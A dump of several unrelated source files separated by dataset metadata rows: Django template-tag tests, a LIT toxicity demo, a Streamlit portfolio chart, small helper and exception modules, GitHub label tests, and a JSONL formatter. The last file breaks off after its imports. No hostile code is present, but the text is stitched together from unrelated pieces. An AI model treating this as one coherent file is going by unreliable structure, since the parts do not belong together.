from example_project.pepulator_factory.models import Pepulator, Distributor
from model_blocks.templatetags import model_filters
from model_blocks.templatetags import model_nodes
class DetailBlockFilterTest (TestCase):
fixtures = ['pepulator_factory_data.json']
def setUp(self):
# Mock Django's get_template so that it doesn't load a real file;
# instead just return a template that allows us to verify the context
model_nodes.get_template = Mock(
return_value=Template(('{{ title|default_if_none:instance|safe }}:{{ model|safe }},'
'{% for name, label, value, is_list, is_link in fields %}'
'{{ name|safe }},'
'{{ label|safe }},'
'{% if not is_list %}'
'{% if is_link %}'
'@{{ value }}'
'{% else %}'
'{{ value|safe }}'
'{% endif %}'
'{% else %}'
'[{% for item in value.all %}{{ item|safe }},{% endfor %}]'
'{% endif %},'
'{% endfor %}')))
def test_model_format(self):
"""Tests that a given model is formatted as expected."""
pepulator = Pepulator.objects.get(serial_number=1235)
expected_detail = (u"Pepulator #1235:pepulator,"
"serial_number,serial number,1235,"
"height,height,12,"
"width,width,15,"
"manufacture_date,manufacture date,2011-06-10 11:12:33,"
"color,color,red,"
"address,address,@ppr://1235/,"
"distributed_by,distributed by,Walmart,"
"knuckles,knuckles,[Knuckle of hardness 2.35,Knuckle of hardness 1.10,],"
"jambs,jambs,[],"
)
detail = model_filters.as_detail_block(pepulator)
model_nodes.get_template.assert_called_with('model_blocks/object_detail.html')
self.assertEqual(detail, expected_detail)
def test_filter_is_registered(self):
"""Test that the filter can be used from within a template"""
template = Template(('{% load model_filters %}'
'{{ pepulator|as_detail_block }}'))
pepulator = Pepulator.objects.get(serial_number=1235)
context = Context({'pepulator':pepulator})
expected_detail = (u"Pepulator #1235:pepulator,"
"serial_number,serial number,1235,"
"height,height,12,"
"width,width,15,"
"manufacture_date,manufacture date,2011-06-10 11:12:33,"
"color,color,red,"
"address,address,@ppr://1235/,"
"distributed_by,distributed by,Walmart,"
"knuckles,knuckles,[Knuckle of hardness 2.35,Knuckle of hardness 1.10,],"
"jambs,jambs,[],"
)
detail = template.render(context)
model_nodes.get_template.assert_called_with('model_blocks/object_detail.html')
self.assertEqual(detail, expected_detail)
def test_title_is_used(self):
"""Test that a title is used if provided"""
template = Template(('{% load model_filters %}'
'{{ pepulator|as_detail_block:"My Pepulator" }}'))
pepulator = Pepulator.objects.get(serial_number=1235)
context = Context({'pepulator':pepulator})
expected_detail = (u"My Pepulator:pepulator,"
"serial_number,serial number,1235,"
"height,height,12,"
"width,width,15,"
"manufacture_date,manufacture date,2011-06-10 11:12:33,"
"color,color,red,"
"address,address,@ppr://1235/,"
"distributed_by,distributed by,Walmart,"
"knuckles,knuckles,[Knuckle of hardness 2.35,Knuckle of hardness 1.10,],"
"jambs,jambs,[],"
)
detail = template.render(context)
model_nodes.get_template.assert_called_with('model_blocks/object_detail.html')
self.assertEqual(detail, expected_detail)
def test_related_fields(self):
"""Tests that related fields not defined on the model are included."""
pepulator = Distributor.objects.get(name="Mom & Pop")
expected_detail = (u"Mom & Pop:distributor,"
"name,name,Mom & Pop,"
"capacity,capacity,175,"
"stock,stock,[Pepulator #1238,],"
)
detail = model_filters.as_detail_block(pepulator)
model_nodes.get_template.assert_called_with('model_blocks/object_detail.html')
self.assertEqual(detail, expected_detail)
class TeaserBlockFilterTest (TestCase):
fixtures = ['pepulator_factory_data.json']
def setUp(self):
# Mock Django's get_template so that it doesn't load a real file;
# instead just return a template that allows us to verify the context
model_nodes.get_template = Mock(
return_value=Template('{{ title|default_if_none:instance|safe }}:{{ model|safe }},{% for name, label, value, is_list in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{{ value|safe }}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}'))
def test_model_format(self):
"""Tests that a given model is formatted as expected."""
pepulator = Pepulator.objects.get(serial_number=1235)
expected_teaser = (u"Pepulator #1235:pepulator,"
"serial_number,serial number,1235,"
"height,height,12,"
"width,width,15,"
"manufacture_date,manufacture date,2011-06-10 11:12:33,"
"color,color,red,"
"address,address,ppr://1235/,"
"distributed_by,distributed by,Walmart,"
"knuckles,knuckles,[Knuckle of hardness 2.35,Knuckle of hardness 1.10,],"
"jambs,jambs,[],"
)
teaser = model_filters.as_teaser_block(pepulator)
model_nodes.get_template.assert_called_with('model_blocks/object_teaser.html')
self.assertEqual(teaser, expected_teaser)
class ListBlockFilterTest (TestCase):
fixtures = ['pepulator_factory_data.json']
def setUp(self):
# Mock Django's get_template so that it doesn't load a real file;
# instead just return a template that allows us to verify the context
model_nodes.get_template = Mock(
return_value=Template('{{ title|default_if_none:model|capfirst }}{% if not title %}s{% endif %}:{{ instance_list|safe }}'))
def test_list_format(self):
"""Tests that a given model is formatted as expected."""
pepulator_list = Pepulator.objects.filter(serial_number__gt=2000)
expected_rendering = (u"Pepulators:[<Pepulator: Pepulator #2345>, "
"<Pepulator: Pepulator #2346>]")
rendering = model_filters.as_list_block(pepulator_list)
model_nodes.get_template.assert_called_with('model_blocks/object_list.html')
self.assertEqual(rendering, expected_rendering)
def test_filter_is_registered(self):
"""Test that the filter can be used from within a template"""
template = Template(('{% load model_filters %}'
'{{ pepulators|as_list_block }}'))
pepulator_list = Pepulator.objects.filter(serial_number__gt=2000)
context = Context({'pepulators':pepulator_list})
expected_rendering = (u"Pepulators:[<Pepulator: Pepulator #2345>, "
"<Pepulator: Pepulator #2346>]")
rendering = template.render(context)
model_nodes.get_template.assert_called_with('model_blocks/object_list.html')
self.assertEqual(rendering, expected_rendering)
def test_empty_queryset(self):
"""Test that the filter can be used from within a template"""
template = Template(('{% load model_filters %}'
'{{ pepulators|as_list_block }}'))
pepulator_list = Pepulator.objects.filter(serial_number__gt=5000)
context = Context({'pepulators':pepulator_list})
expected_rendering = (u"Pepulators:[]")
rendering = template.render(context)
model_nodes.get_template.assert_called_with('model_blocks/object_list.html')
self.assertEqual(rendering, expected_rendering)
def test_non_query_set_results_in_no_model(self):
"""Test that when a non queryset is used, the model is None"""
# Why? Because we try to read the model off of the queryset. If we just
# have a list of objects, then we don't know the model.
template = Template(('{% load model_filters %}'
'{{ pepulators|as_list_block }}'))
pepulator_list = [p for p in Pepulator.objects.filter(serial_number__gt=2000)]
context = Context({'pepulators':pepulator_list})
expected_rendering = (u"Nones:[<Pepulator: Pepulator #2345>, "
"<Pepulator: Pepulator #2346>]")
rendering = template.render(context)
model_nodes.get_template.assert_called_with('model_blocks/object_list.html')
self.assertEqual(rendering, expected_rendering)
def test_empty_list(self):
"""Test that when a non queryset is used, the model is None"""
template = Template(('{% load model_filters %}'
'{{ pepulators|as_list_block }}'))
pepulator_list = []
context = Context({'pepulators':pepulator_list})
expected_rendering = (u"Nones:[]")
rendering = template.render(context)
model_nodes.get_template.assert_called_with('model_blocks/object_list.html')
self.assertEqual(rendering, expected_rendering)
def test_alternate_title_is_used(self):
"""Test that a list title is used if provided"""
template = Template(('{% load model_filters %}'
'{{ pepulators|as_list_block:"Some Pepulators" }}'))
pepulator_list = Pepulator.objects.filter(serial_number__gt=2000)
context = Context({'pepulators':pepulator_list})
expected_rendering = (u"Some Pepulators:[<Pepulator: Pepulator #2345>, "
"<Pepulator: Pepulator #2346>]")
rendering = template.render(context)
model_nodes.get_template.assert_called_with('model_blocks/object_list.html')
self.assertEqual(rendering, expected_rendering)
class DetailBlockTagTest (TestCase):
fixtures = ['pepulator_factory_data.json']
def setUp(self):
# Mock Django's get_template so that it doesn't load a real file;
# instead just return a template that allows us to verify the context
model_nodes.get_template = Mock(
return_value=Template('{{ title|default_if_none:instance|safe }}:{{ model|safe }},{% for name, label, value, is_list in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{{ value|safe }}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}'))
def test_tag_is_registered(self):
"""Test that the filter can be used from within a template"""
template = Template(('{% load model_tags %}'
'{% with pepulator_factory_pepulator_detail_template="pepulator_factory/pepulator_detail.html" %}'
'{% detail_block pepulator %}'
'{% endwith %}'))
pepulator = Pepulator.objects.get(serial_number=1235)
context = Context({'pepulator':pepulator})
expected_detail = (u"Pepulator #1235:pepulator,"
"serial_number,serial number,1235,"
"height,height,12,"
"width,width,15,"
"manufacture_date,manufacture date,2011-06-10 11:12:33,"
"color,color,red,"
"address,address,ppr://1235/,"
"distributed_by,distributed by,Walmart,"
"knuckles,knuckles,[Knuckle of hardness 2.35,Knuckle of hardness 1.10,],"
"jambs,jambs,[],"
)
detail = template.render(context)
model_nodes.get_template.assert_called_with('pepulator_factory/pepulator_detail.html')
self.assertEqual(detail, expected_detail)
def test_with_specific_fields(self):
"""Test that the included fields spec is respected"""
template = Template(('{% load model_tags %}'
'{% with pepulator_factory_pepulator_detail_template="pepulator_factory/pepulator_detail.html" %}'
'{% with pepulator_factory_pepulator_fields="serial_number, color, height, width" %}'
'{% detail_block pepulator %}'
'{% endwith %}'
'{% endwith %}'))
pepulator = Pepulator.objects.get(serial_number=1235)
context = Context({'pepulator':pepulator})
expected_detail = (u"Pepulator #1235:pepulator,"
"serial_number,serial number,1235,"
"color,color,red,"
"height,height,12,"
"width,width,15,"
)
detail = template.render(context)
self.assertEqual(detail, expected_detail)
def test_with_excluded_fields(self):
"""Test that the excluded fields spec is respected"""
template = Template(('{% load model_tags %}'
'{% with pepulator_factory_pepulator_detail_template="pepulator_factory/pepulator_detail.html" %}'
'{% with pepulator_factory_pepulator_exclude="knuckles, jambs, color, address" %}'
'{% detail_block pepulator %}'
'{% endwith %}'
'{% endwith %}'))
pepulator = Pepulator.objects.get(serial_number=1235)
context = Context({'pepulator':pepulator})
expected_detail = (u"Pepulator #1235:pepulator,"
"serial_number,serial number,1235,"
"height,height,12,"
"width,width,15,"
"manufacture_date,manufacture date,2011-06-10 11:12:33,"
"distributed_by,distributed by,Walmart,"
)
detail = template.render(context)
self.assertEqual(detail, expected_detail)
def test_fail_on_wrong_number_of_arguments(self):
self.assertRaises(TemplateSyntaxError, Template,
('{% load model_tags %}'
'{% detail_block pepulator "overflow" %}'))
self.assertRaises(TemplateSyntaxError, Template,
('{% load model_tags %}'
'{% detail_block %}'))
class TeaserBlockTagTest (TestCase):
fixtures = ['pepulator_factory_data.json']
def setUp(self):
# Mock Django's get_template so that it doesn't load a real file;
# instead just return a template that allows us to verify the context
model_nodes.get_template = Mock(
return_value=Template('{{ title|default_if_none:instance|safe }}:{{ model|safe }},{% for name, label, value, is_list in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{{ value|safe }}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}'))
def test_tag_is_registered(self):
"""Test that the filter can be used from within a template"""
template = Template(('{% load model_tags %}'
'{% with pepulator_factory_pepulator_teaser_template="pepulator_factory/pepulator_teaser.html" %}'
'{% teaser_block pepulator %}'
'{% endwith %}'))
pepulator = Pepulator.objects.get(serial_number=1235)
context = Context({'pepulator':pepulator})
expected_teaser = (u"Pepulator #1235:pepulator,"
"serial_number,serial number,1235,"
"height,height,12,"
"width,width,15,"
"manufacture_date,manufacture date,2011-06-10 11:12:33,"
"color,color,red,"
"address,address,ppr://1235/,"
"distributed_by,distributed by,Walmart,"
"knuckles,knuckles,[Knuckle of hardness 2.35,Knuckle of hardness 1.10,],"
"jambs,jambs,[],"
)
teaser = template.render(context)
model_nodes.get_template.assert_called_with('pepulator_factory/pepulator_teaser.html')
self.assertEqual(teaser, expected_teaser)
def test_fail_on_wrong_number_of_arguments(self):
self.assertRaises(TemplateSyntaxError, Template,
('{% load model_tags %}'
'{% teaser_block pepulator "overflow" %}'))
self.assertRaises(TemplateSyntaxError, Template,
('{% load model_tags %}'
'{% teaser_block %}'))
class ListBlockTagTest (TestCase):
fixtures = ['pepulator_factory_data.json']
def setUp(self):
# Mock Django's get_template so that it doesn't load a real file;
# instead just return a template that allows us to verify the context
model_nodes.get_template = Mock(
return_value=Template('{{ title|default_if_none:model|capfirst }}{% if not title %}s{% endif %}:{{ instance_list|safe }}'))
def test_filter_is_registered(self):
"""Test that the filter can be used from within a template"""
template = Template(('{% load model_tags %}'
'{% with pepulator_factory_pepulator_list_template="pepulator_factory/pepulator_list.html" %}'
'{% list_block pepulators %}'
'{% endwith %}'))
pepulator_list = Pepulator.objects.filter(serial_number__gt=2000)
context = Context({'pepulators':pepulator_list})
expected_rendering = (u"Pepulators:[<Pepulator: Pepulator #2345>, "
"<Pepulator: Pepulator #2346>]")
rendering = template.render(context)
model_nodes.get_template.assert_called_with('pepulator_factory/pepulator_list.html')
self.assertEqual(rendering, expected_rendering)
def test_fail_on_wrong_number_of_arguments(self):
self.assertRaises(TemplateSyntaxError, Template,
('{% load model_tags %}'
'{% list_block pepulators "overflow" %}'))
self.assertRaises(TemplateSyntaxError, Template,
('{% load model_tags %}'
'{% list_block %}'))
class ModelBlockModuleTest (TestCase):
def test_all_tags_and_filters_loaded(self):
template = Template(('{% load model_blocks %}'
'{% detail_block pepulator %}'
'{% list_block pepulators %}'
'{{ pepulator|as_detail_block }}'
'{{ pepulators|as_list_block }}'))
# We just care that everything loaded, and we were able to get here
        # without incident.
self.assert_(True)
class SideEffectsTest (TestCase):
fixtures = ['pepulator_factory_data.json']
def setUp(self):
# Mock Django's get_template so that it doesn't load a real file;
# instead just return a template that allows us to verify the context
model_nodes.get_template = Mock(
return_value=Template('{{ title|default_if_none:model|capfirst }}{% if not title %}s{% endif %}'))
def test_model_doesnt_carry_over_into_future_blocks(self):
template = Template(('{% load model_tags %}'
'{{ model }}'
'{% list_block distributors %}'
'{{ model }}'))
distributor_list = Distributor.objects.all()
context = Context({'model':'My String',
'distributors':distributor_list})
expected_rendering = (u"My String"
"Distributors"
"My String")
rendering = template.render(context)
self.assertEqual(rendering, expected_rendering)
| 44.453782
| 304
| 0.578544
| 20,680
| 0.977316
| 0
| 0
| 0
| 0
| 0
| 0
| 9,265
| 0.437854
|
3bd65ecba92bc72c9d3f44c46609ce82742a80af
| 1,794
|
py
|
Python
|
lit_nlp/examples/toxicity_demo.py
|
ghostian/lit
|
891673ef120391f4682be4478881fdb408241f82
|
[
"Apache-2.0"
] | null | null | null |
lit_nlp/examples/toxicity_demo.py
|
ghostian/lit
|
891673ef120391f4682be4478881fdb408241f82
|
[
"Apache-2.0"
] | null | null | null |
lit_nlp/examples/toxicity_demo.py
|
ghostian/lit
|
891673ef120391f4682be4478881fdb408241f82
|
[
"Apache-2.0"
] | null | null | null |
# Lint as: python3
r"""LIT Demo for a Toxicity model.
To run locally:
python -m lit_nlp.examples.toxicity_demo --port=5432
Once you see the ASCII-art LIT logo, navigate to localhost:5432 to access the
demo UI.
"""
from absl import app
from absl import flags
from absl import logging
from lit_nlp import dev_server
from lit_nlp import server_flags
from lit_nlp.examples.datasets import classification
from lit_nlp.examples.models import glue_models
TOXICITY_MODEL_PATH = "https://storage.googleapis.com/what-if-tool-resources/lit-models/toxicity.tar.gz" # pylint: disable=line-too-long
import transformers
TOXICITY_MODEL_PATH = transformers.file_utils.cached_path(TOXICITY_MODEL_PATH,
extract_compressed_file=True)
# NOTE: additional flags defined in server_flags.py
FLAGS = flags.FLAGS
FLAGS.set_default("development_demo", True)
flags.DEFINE_string("model_path", TOXICITY_MODEL_PATH,
"Path to save trained model.")
flags.DEFINE_integer(
"max_examples", 1000, "Maximum number of examples to load into LIT. ")
def main(_):
model_path = FLAGS.model_path
logging.info("Working directory: %s", model_path)
# Load our trained model.
models = {"toxicity": glue_models.ToxicityModel(model_path)}
datasets = {"toxicity_test": classification.ToxicityData("test")}
# Truncate datasets if --max_examples is set.
for name in datasets:
logging.info("Dataset: '%s' with %d examples", name, len(datasets[name]))
datasets[name] = datasets[name].slice[:FLAGS.max_examples]
logging.info(" truncated to %d examples", len(datasets[name]))
# Start the LIT server. See server_flags.py for server options.
lit_demo = dev_server.Server(models, datasets, **server_flags.get_flags())
lit_demo.serve()
if __name__ == "__main__":
app.run(main)
| 30.931034
| 137
| 0.755295
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 757
| 0.421962
|
3bd7deac97fd990b363d6a3492c5b97386f321f3
| 2,669
|
py
|
Python
|
portifolio_analysis.py
|
lucasHashi/app-calculate-stock-portifolio-division
|
1e2d852215db29f9768bf509d2f52bdec5988ad4
|
[
"MIT"
] | null | null | null |
portifolio_analysis.py
|
lucasHashi/app-calculate-stock-portifolio-division
|
1e2d852215db29f9768bf509d2f52bdec5988ad4
|
[
"MIT"
] | null | null | null |
portifolio_analysis.py
|
lucasHashi/app-calculate-stock-portifolio-division
|
1e2d852215db29f9768bf509d2f52bdec5988ad4
|
[
"MIT"
] | null | null | null |
import pandas as pd
import streamlit as st
import plotly.graph_objects as go
import plotly.express as px
import plotly.io as pio
pio.templates.default = "plotly_white"
def load_portifolio_analysis(df_stocks_and_grades):
st.write('# Portifolio analysis')
st.write('## Investments by sector and sub sector')
# fig_sunburst_stocks = load_sunburst_figure(df_stocks_and_grades)
# st.write(fig_sunburst_stocks)
fig_treemap_stocks = load_treemap_figure(df_stocks_and_grades)
st.write(fig_treemap_stocks)
def load_sunburst_figure(df):
df_stocks_hierarchy = calculate_stocks_hierarchy(df)
st.write(df_stocks_hierarchy)
fig_sunburst_stocks = go.Figure(go.Sunburst(
labels=df_stocks_hierarchy['labels'],
parents=df_stocks_hierarchy['parents'],
values=df_stocks_hierarchy['values']
))
return fig_sunburst_stocks
def load_treemap_figure(df):
fig_treemap_stocks = px.treemap(
df,
path=['sector', 'sub_sector', 'stock'],
values='grade',
hover_name='investment',
)
df_stocks_hierarchy = calculate_stocks_hierarchy(df)
fig_treemap_stocks = go.Figure(
go.Treemap(
labels=df_stocks_hierarchy['labels'],
parents=df_stocks_hierarchy['parents'],
values=df_stocks_hierarchy['values'],
customdata = df_stocks_hierarchy['values_text'],
hovertemplate='<b>%{label} </b> <br>%{customdata}',
)
)
return fig_treemap_stocks
def calculate_stocks_hierarchy(df):
sectors_duplicated = list(df.loc[df['sector'] == df['sub_sector'], 'sector'])
df['sector'] = df['sector'].apply(lambda sector: sector + '.' if sector in sectors_duplicated else sector)
labels = ['Stocks'] + list(df['sector']) + list(df['sub_sector']) + list(df['stock'])
parents = ['']
parents = parents + ['Stocks'] * len(list(df['sector']))
parents = parents + list(df['sector'])
parents = parents + list(df['sub_sector'])
values = [0] * (len(df) * 2 + 1)
values = values + list(df['investment'])
values_text = [df['investment'].sum()]
values_text = values_text + [df[(df['sector'] == stock) | (df['sub_sector'] == stock) | (df['stock'] == stock)]['investment'].sum() for stock in labels[1:]]
values_text = ["R$ " + "%.2f" % value for value in values_text]
df_stocks_hierarchy = pd.DataFrame({'labels': labels, 'parents': parents, 'values': values, 'values_text': values_text})
df_stocks_hierarchy.drop_duplicates(subset=['parents', 'labels'], inplace=True)
df_stocks_hierarchy.reset_index(drop=True, inplace=True)
return df_stocks_hierarchy
| 32.54878
| 160
| 0.671787
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 569
| 0.213188
|
3bd99b382f3bb66011f0a2e220815e6d5fe49246
| 864
|
py
|
Python
|
clicrud/clicrud/helpers.py
|
DavidJohnGee/clicrud
|
f1f178ac44649efe7b7681d37e97d2632b8971b2
|
[
"Apache-2.0"
] | 9
|
2015-12-07T23:00:24.000Z
|
2021-06-23T21:31:47.000Z
|
clicrud/clicrud/helpers.py
|
DavidJohnGee/clicrud
|
f1f178ac44649efe7b7681d37e97d2632b8971b2
|
[
"Apache-2.0"
] | 8
|
2016-04-05T12:36:54.000Z
|
2017-05-15T16:00:08.000Z
|
clicrud/clicrud/helpers.py
|
DavidJohnGee/clicrud
|
f1f178ac44649efe7b7681d37e97d2632b8971b2
|
[
"Apache-2.0"
] | 7
|
2016-06-02T23:39:05.000Z
|
2021-03-25T20:52:46.000Z
|
"""
Copyright 2015 Brocade Communications Systems, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
def getpid():
_strPID = ""
if hasattr(os, 'getpid'): # only available on Unix
_strPID = os.getpid()
return _strPID
def cls():
OS = {
'posix': 'clear',
'nix': 'cls',
'nt': 'cls'
}
os.system(OS.get(os.name))
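if __name__ == '__main__':
    # Tiny illustrative check of the helpers above (not part of clicrud's API):
    # print the current process id, then clear the terminal using the command
    # mapped for this platform in cls().
    print('running under PID: {}'.format(getpid()))
    cls()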
| 24.685714
| 72
| 0.689815
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 651
| 0.753472
|
3bd9caeeddf847dd9546e4e833234ce3cce7f394
| 28
|
py
|
Python
|
patton_server/service/__init__.py
|
directionless/patton-server
|
da39cb8b09029dbcf4edd5c78abb150dc53e8ebe
|
[
"Apache-2.0"
] | null | null | null |
patton_server/service/__init__.py
|
directionless/patton-server
|
da39cb8b09029dbcf4edd5c78abb150dc53e8ebe
|
[
"Apache-2.0"
] | null | null | null |
patton_server/service/__init__.py
|
directionless/patton-server
|
da39cb8b09029dbcf4edd5c78abb150dc53e8ebe
|
[
"Apache-2.0"
] | null | null | null |
from .make_web_app import *
| 14
| 27
| 0.785714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
3bda0b8e560a339719620c78e288885bd05aa2f6
| 689
|
py
|
Python
|
lib/abridger/exc.py
|
willangenent/abridger
|
6daa80f7360339376b38544ce60694c5addaa30f
|
[
"MIT"
] | 8
|
2016-10-19T14:15:34.000Z
|
2020-06-23T09:37:02.000Z
|
lib/abridger/exc.py
|
freewilll/abridger
|
6daa80f7360339376b38544ce60694c5addaa30f
|
[
"MIT"
] | null | null | null |
lib/abridger/exc.py
|
freewilll/abridger
|
6daa80f7360339376b38544ce60694c5addaa30f
|
[
"MIT"
] | null | null | null |
class AbridgerError(Exception):
pass
class ConfigFileLoaderError(AbridgerError):
pass
class IncludeError(ConfigFileLoaderError):
pass
class DataError(ConfigFileLoaderError):
pass
class FileNotFoundError(ConfigFileLoaderError):
pass
class DatabaseUrlError(AbridgerError):
pass
class ExtractionModelError(AbridgerError):
pass
class UnknownTableError(AbridgerError):
pass
class UnknownColumnError(AbridgerError):
pass
class InvalidConfigError(ExtractionModelError):
pass
class RelationIntegrityError(ExtractionModelError):
pass
class GeneratorError(Exception):
pass
class CyclicDependencyError(GeneratorError):
pass
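# Minimal sketch of how callers can use this hierarchy; the two callables are
# illustrative stand-ins, not part of abridger itself. Catching
# ConfigFileLoaderError covers IncludeError/DataError/FileNotFoundError (the
# abridger class above, which shadows the builtin), while GeneratorError
# deliberately sits outside the AbridgerError tree.
def _example_error_handling(load_config, run_generator):
    try:
        load_config()
    except FileNotFoundError as exc:      # abridger's FileNotFoundError
        print('missing file: {}'.format(exc))
    except ConfigFileLoaderError as exc:  # IncludeError, DataError, ...
        print('bad config: {}'.format(exc))
    except AbridgerError as exc:          # any other abridger failure
        print('abridger error: {}'.format(exc))
    try:
        run_generator()
    except CyclicDependencyError as exc:
        print('cyclic dependency: {}'.format(exc))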
| 13.509804
| 51
| 0.776488
| 652
| 0.946299
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
3bdb6220329725e793142bac8d5000ba99303cc3
| 989
|
py
|
Python
|
common/permissions.py
|
pedro-hs/financial-account
|
7e8e4d0f3ac888fa36a091d0e733a8e1926180d2
|
[
"MIT"
] | null | null | null |
common/permissions.py
|
pedro-hs/financial-account
|
7e8e4d0f3ac888fa36a091d0e733a8e1926180d2
|
[
"MIT"
] | null | null | null |
common/permissions.py
|
pedro-hs/financial-account
|
7e8e4d0f3ac888fa36a091d0e733a8e1926180d2
|
[
"MIT"
] | null | null | null |
from rest_framework.permissions import BasePermission, IsAuthenticated
class IsBackOffice(BasePermission):
def has_permission(self, request, view):
return bool(request.user and request.user.is_authenticated and request.user.role == 'collaborator')
class IsUserBase(IsAuthenticated):
def has_permission(self, request, view):
return bool(request.user and request.user.is_authenticated and
request.user.role in ('customer', 'collaborator'))
class IsUser(IsUserBase):
def has_object_permission(self, request, view, instance):
if request.user.role == 'collaborator':
return True
return request.user.role == 'customer' and instance.user == request.user
class IsUserCompany(IsUserBase):
def has_object_permission(self, request, view, instance):
if request.user.role == 'collaborator':
return True
return request.user.role == 'customer' and instance.company.user == request.user
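# Illustrative sketch (not part of this module) of attaching these permission
# classes to a DRF view; AccountStatusView and the `role` field on the user
# model are assumptions of the surrounding project.
from rest_framework.response import Response
from rest_framework.views import APIView


class AccountStatusView(APIView):
    # customers and collaborators pass the role check; per-object ownership is
    # additionally enforced by IsUser.has_object_permission in detail views
    # that call check_object_permissions()
    permission_classes = [IsUser]

    def get(self, request):
        return Response({'role': request.user.role})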
| 34.103448
| 107
| 0.706775
| 906
| 0.916077
| 0
| 0
| 0
| 0
| 0
| 0
| 86
| 0.086957
|
3bdba7505ba48dff77d09ed882c1ad53fae133f6
| 956
|
py
|
Python
|
mcp_generation/mcqa_formatter.py
|
yuchenlin/XCSR
|
ace4336de98a8567fcad43498907e0efefe70de4
|
[
"MIT"
] | 16
|
2021-06-14T00:54:28.000Z
|
2022-03-06T08:52:21.000Z
|
mcp_generation/mcqa_formatter.py
|
yuchenlin/XCSR
|
ace4336de98a8567fcad43498907e0efefe70de4
|
[
"MIT"
] | null | null | null |
mcp_generation/mcqa_formatter.py
|
yuchenlin/XCSR
|
ace4336de98a8567fcad43498907e0efefe70de4
|
[
"MIT"
] | 2
|
2021-08-02T18:54:33.000Z
|
2021-09-20T05:37:02.000Z
|
import json
probes = []
with open("./multilingual_probes.jsonl",'r') as f:
for line in f:
        # str.rstrip takes a set of characters, so this strips trailing '\n', '|' and '\r'
        probes.append(json.loads(line.rstrip('\n|\r')))
results = []
for probe in probes:
new_items = {}
answer_labels = ["A", "B", "C", "D", "E","F","G","H"]
print(probe["truth_id"])
answerKey = answer_labels[probe["truth_id"]]
new_items["id"] = probe["id"]
new_items["lang"] = probe["langs"]
new_items["question"] = {"stem": " "}
new_items["question"]["choices"] = [{"label": l , "text":t} for l,t in zip(answer_labels, probe["probes"])]
new_items["answerKey"] = answerKey
results.append(new_items)
with open('/path/to/mcp_data/train.jsonl','w') as f:
for result in results[:-1000]:
json.dump(result,f, ensure_ascii=False)
f.write('\n')
with open('/path/to/mcp_data/dev.jsonl','w') as f:
for result in results[-1000:]:
json.dump(result,f, ensure_ascii=False)
f.write('\n')
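# For reference, each line written above is a JSON object of the form below
# (the values shown are placeholders, not real data):
#
# {"id": "...", "lang": "...",
#  "question": {"stem": " ",
#               "choices": [{"label": "A", "text": "..."},
#                           {"label": "B", "text": "..."}]},
#  "answerKey": "A"}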
| 29.875
| 111
| 0.599372
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 248
| 0.259414
|
3bdc4d0f00442b263a279d7821b9572ea9833620
| 2,016
|
py
|
Python
|
tests/test_behavior.py
|
beskyfil/labels
|
0a1e4831621ce2027ebc9af3e4161f03ff946a6d
|
[
"MIT"
] | null | null | null |
tests/test_behavior.py
|
beskyfil/labels
|
0a1e4831621ce2027ebc9af3e4161f03ff946a6d
|
[
"MIT"
] | null | null | null |
tests/test_behavior.py
|
beskyfil/labels
|
0a1e4831621ce2027ebc9af3e4161f03ff946a6d
|
[
"MIT"
] | null | null | null |
import pytest
from labelsync.github import Github
from labelsync.helpers import HTTPError
from tests.helpers import fl, FIXTURES_PATH, create_cfg_env, get_labels
c = create_cfg_env('good.cfg')
github = Github(c, name='github', api_url='https://api.github.com/repos')
label = {
'name':'blabla',
'color':'aa11bb',
'description':'whatever'
}
label_bug = {
'name':'bug',
'color':'d73a4a',
'description':'Something isn\'t working'
}
label_new_bug = {
'name':'ERROR',
'color':'ffffff',
'description':'ERROR'
}
def test_create_label():
labels_before = get_labels('beskyfil', 'testing_repo')
num_labels_before = len(labels_before)
github.create_label('beskyfil', 'testing_repo', label)
labels_after = get_labels('beskyfil', 'testing_repo')
num_labels_after = len(labels_after)
assert num_labels_before == num_labels_after - 1
assert 'blabla' not in labels_before
assert 'blabla' in labels_after
def test_delete_label():
labels_before = get_labels('beskyfil', 'testing_repo')
num_labels_before = len(labels_before)
github.delete_label('beskyfil', 'testing_repo', label['name'])
labels_after = get_labels('beskyfil', 'testing_repo')
num_labels_after = len(labels_after)
assert num_labels_before == num_labels_after + 1
assert 'blabla' in labels_before
assert 'blabla' not in labels_after
def test_edit_label():
labels_before = get_labels('beskyfil', 'testing_repo')
num_labels_before = len(labels_before)
github.edit_label('beskyfil', 'testing_repo', label_new_bug, 'bug')
labels_after = get_labels('beskyfil', 'testing_repo')
num_labels_after = len(labels_after)
assert num_labels_before == num_labels_after
assert 'bug' in labels_before
assert 'bug' not in labels_after
assert 'ERROR' in labels_after
assert 'ERROR' not in labels_before
#revert
github.edit_label('beskyfil', 'testing_repo', label_bug, 'ERROR')
| 28.8
| 73
| 0.695933
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 534
| 0.264881
|
3bdfbd90f140aef1f2b7005698a05751030fadf0
| 4,249
|
py
|
Python
|
authentication/cryptosign/function/authenticator.py
|
oberstet/crossbar-examples
|
852680eee646cf5479bff18ec727a8026d9bdcda
|
[
"Apache-2.0"
] | null | null | null |
authentication/cryptosign/function/authenticator.py
|
oberstet/crossbar-examples
|
852680eee646cf5479bff18ec727a8026d9bdcda
|
[
"Apache-2.0"
] | null | null | null |
authentication/cryptosign/function/authenticator.py
|
oberstet/crossbar-examples
|
852680eee646cf5479bff18ec727a8026d9bdcda
|
[
"Apache-2.0"
] | null | null | null |
import copy
import random
from pprint import pformat
from txaio import make_logger
